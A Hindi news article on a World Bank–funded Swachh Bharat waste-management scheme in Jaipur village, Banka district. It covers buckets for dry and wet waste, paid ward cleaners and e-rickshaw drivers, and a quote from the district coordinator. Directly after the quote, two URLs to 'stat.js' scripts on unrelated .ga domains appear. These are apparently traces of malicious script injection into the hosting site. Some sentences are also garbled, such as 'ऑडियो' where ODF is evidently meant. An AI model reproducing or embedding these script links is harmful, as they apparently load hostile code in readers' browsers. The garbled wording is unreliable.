बांका जिले के जयपुर गांव में स्वच्छ भारत अभियान के अंतर्गत एक नई पहल शुरू की गई है। स्वच्छ भारत अभियान के अंतर्गत अब युवाओं को रोजगार भी देने की तैयारी की जा रही है दरअसल विश्व बैंक में जिले के चार प्रखंड में एक-एक पंचायत को गोद लिया है।

 

 

आपको बता दें, संपूर्ण भारत स्वच्छता अभियान के अंतर्गत नीर निर्मल परियोजना से हर घर नल का स्वच्छ जल के साथ पूरे गांव को स्वच्छ बनाने का लक्ष्य रखा गया है। विदित हो कि 2014 में संपूर्ण भारत स्वच्छता अभियान चलाया गया था और 2019 में ऑडियो के साथ या समाप्त हो गया अब इसका फेस टू चल रहा है और प्राथमिकता के तौर पर विश्व बैंक ने कुछ चिन्हित पंचायतों में सूखा एवं गीला कचरा खत्म करने के लिए 1 साल का लगभग 25 लाख रुपए अतिरिक्त बजट तय किया है।

 

 

 

सूखे और गीले कचरे को इकट्ठा करने के लिए दो दो बाल्टी हर घर में दे दी गई है। इसी के साथ साथ गांव के पंचायत के सभी वार्ड में सफाई के लिए एक एक ट्रॉली रिक्शा के साथ दो दो लोगों की नियुक्ति कर दी गई है और वेतन के रूप में उन्हें ₹3000 खाते में दिए जाएंगे। हर वार्ड में जमा किए गए कचरे को सेंटर तक लाने के लिए ई-रिक्शा का भी इंतजाम किया गया है और रिक्शा चालकों को ₹4000 प्रतिमाह दिए जाएंगे। इसी के साथ-साथ लोगों को रोजगार भी मिलेगा।

 

 

 

एसबीएम के जिला कोऑर्डिनेटर राहुल कुमार ने कहा, “संपूर्ण भारत स्वच्छता अभियान ओडीएफ फेज़ टू के तहत प्राथमिकता के तौर पर विश्व बैंक द्वारा संचालित नीर निर्मल परियोजना के तहत चल रहे पंचायतों में सॉलिड लिक्विड रिसोर्स मैनेजमेंट का काम शुरू किया गया है। धीरे-धीरे हर गांव में योजना को लागू किया जाएगा।”https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.